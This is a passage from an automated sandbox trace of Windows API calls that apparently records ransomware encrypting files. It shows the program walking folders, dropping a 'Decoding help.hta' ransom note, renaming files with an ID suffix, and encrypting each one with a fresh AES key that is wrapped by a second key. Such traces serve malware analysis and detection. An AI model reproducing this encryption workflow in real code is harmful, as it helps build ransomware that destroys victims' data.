lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" [0046.302] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\decoding help.hta")) returned 0x1 [0046.302] lstrcmpiW (lpString1="Decoding help.hta", lpString2="LeiaMe.htm") returned -1 [0046.302] lstrlenW (lpString="LeiaMe.htm") returned 10 [0046.302] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0046.302] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0046.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="LeiaMe.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" [0046.302] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" [0046.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0046.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0046.303] CreateFileMappingA (hFile=0x3c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c4 [0046.303] CryptAcquireContextA (in: phProv=0xadcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xadcfcec*=0x34491c0) returned 1 [0046.304] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0xadcfce8 | out: phKey=0xadcfce8*=0x671cb0) returned 1 [0046.304] CryptExportKey (in: hKey=0x671cb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xadcfbe4, pdwDataLen=0xadcfce4 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfce4*=0x2c) returned 1 [0046.304] MapViewOfFile (hFileMappingObject=0x3c4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4260) returned 0x2fe0000 [0048.146] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x100) returned 1 [0049.195] CryptEncrypt (in: hKey=0x671cb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fe0000, pdwDataLen=0xadcfce4*=0x4260, dwBufLen=0x4260 | out: pbData=0x2fe0000*, pdwDataLen=0xadcfce4*=0x4260) returned 1 [0049.475] UnmapViewOfFile (lpBaseAddress=0x2fe0000) returned 1 [0049.549] CloseHandle (hObject=0x3c4) returned 1 [0049.549] CryptDestroyKey (hKey=0x671cb0) returned 1 [0049.549] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0049.549] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.549] WriteFile (in: hFile=0x3c0, lpBuffer=0xadcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xadcfbe4*, lpNumberOfBytesWritten=0xadcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0051.178] WriteFile (in: hFile=0x3c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xadcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0051.178] CloseHandle (hObject=0x3c0) returned 1 [0051.676] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.300] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xadcfd30 | out: lpFindFileData=0xadcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Liesmich.htm", cAlternateFileName="")) returned 1 [0055.300] lstrcpyW (in: lpString1=0x9a32f30, lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0055.300] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0055.300] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" [0055.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\decoding help.hta")) returned 0x1 [0055.300] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Liesmich.htm") returned -1 [0055.300] lstrlenW (lpString="Liesmich.htm") returned 12 [0055.300] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0055.300] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0055.301] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Liesmich.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" [0055.301] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" [0055.301] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0055.301] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.262] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0056.262] CreateFileMappingA (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x880 [0056.262] CryptAcquireContextA (in: phProv=0xadcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xadcfcec*=0x344a348) returned 1 [0059.822] CryptGenKey (in: hProv=0x344a348, Algid=0x6610, dwFlags=0x1, phKey=0xadcfce8 | out: phKey=0xadcfce8*=0x5d8010) returned 1 [0059.822] CryptExportKey (in: hKey=0x5d8010, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xadcfbe4, pdwDataLen=0xadcfce4 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfce4*=0x2c) returned 1 [0059.822] MapViewOfFile (hFileMappingObject=0x880, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x42a0) returned 0x2d0000 [0059.839] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x100) returned 1 [0059.839] CryptEncrypt (in: hKey=0x5d8010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0xadcfce4*=0x42a0, dwBufLen=0x42a0 | out: pbData=0x2d0000*, pdwDataLen=0xadcfce4*=0x42a0) returned 1 [0059.840] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0059.842] CloseHandle (hObject=0x880) returned 1 [0059.842] CryptDestroyKey (hKey=0x5d8010) returned 1 [0059.842] CryptReleaseContext (hProv=0x344a348, dwFlags=0x0) returned 1 [0059.842] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.842] WriteFile (in: hFile=0x128, lpBuffer=0xadcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xadcfbe4*, lpNumberOfBytesWritten=0xadcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.288] WriteFile (in: hFile=0x128, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xadcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.288] CloseHandle (hObject=0x128) returned 1 [0061.288] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.288] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xadcfd30 | out: lpFindFileData=0xadcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f82a560, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lisezmoi.htm", cAlternateFileName="")) returned 1 [0061.288] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0061.288] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0061.288] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" [0061.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\decoding help.hta")) returned 0x1 [0061.288] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Lisezmoi.htm") returned -1 [0061.289] lstrlenW (lpString="Lisezmoi.htm") returned 12 [0061.289] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0061.289] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0061.289] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Lisezmoi.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" [0061.289] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" [0061.289] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0061.289] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0062.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x854 [0062.755] CreateFileMappingA (hFile=0x854, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x38c [0062.755] CryptAcquireContextA (phProv=0xadcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 116 os_tid = 0x414 [0040.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*.*", lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a57b0 [0040.746] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.746] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.746] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.746] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.746] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0040.746] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0040.746] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0040.746] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0041.018] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*.*" [0041.018] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*.*") returned 51 [0041.018] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft" [0041.018] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*.*" [0041.018] GlobalMemoryStatus (in: lpBuffer=0xaf0fd10 | out: lpBuffer=0xaf0fd10) [0041.018] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x111b3c88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x388 [0041.030] CloseHandle (hObject=0x388) returned 1 [0041.030] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0041.030] FindClose (in: hFindFile=0x5a57b0 | out: hFindFile=0x5a57b0) returned 1 Thread: id = 117 os_tid = 0x438 [0040.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0xb04fd30 | out: lpFindFileData=0xb04fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d83d0 [0041.757] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.757] FindNextFileW (in: hFindFile=0x5d83d0, lpFindFileData=0xb04fd30 | out: lpFindFileData=0xb04fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.757] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.757] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.757] FindNextFileW (in: hFindFile=0x5d83d0, lpFindFileData=0xb04fd30 | out: lpFindFileData=0xb04fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0041.757] lstrcpyW (in: lpString1=0x9a63000, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*" [0041.757] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.757] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.757] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0042.005] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xb04fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xb04fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.006] CloseHandle (hObject=0x4bc) returned 1 [0042.006] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.007] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OutlkLR.cab") returned -1 [0042.007] lstrlenW (lpString="OutlkLR.cab") returned 11 [0042.007] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*" [0042.007] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0042.007] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpString2="OutlkLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" [0042.007] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" [0042.007] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0042.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), 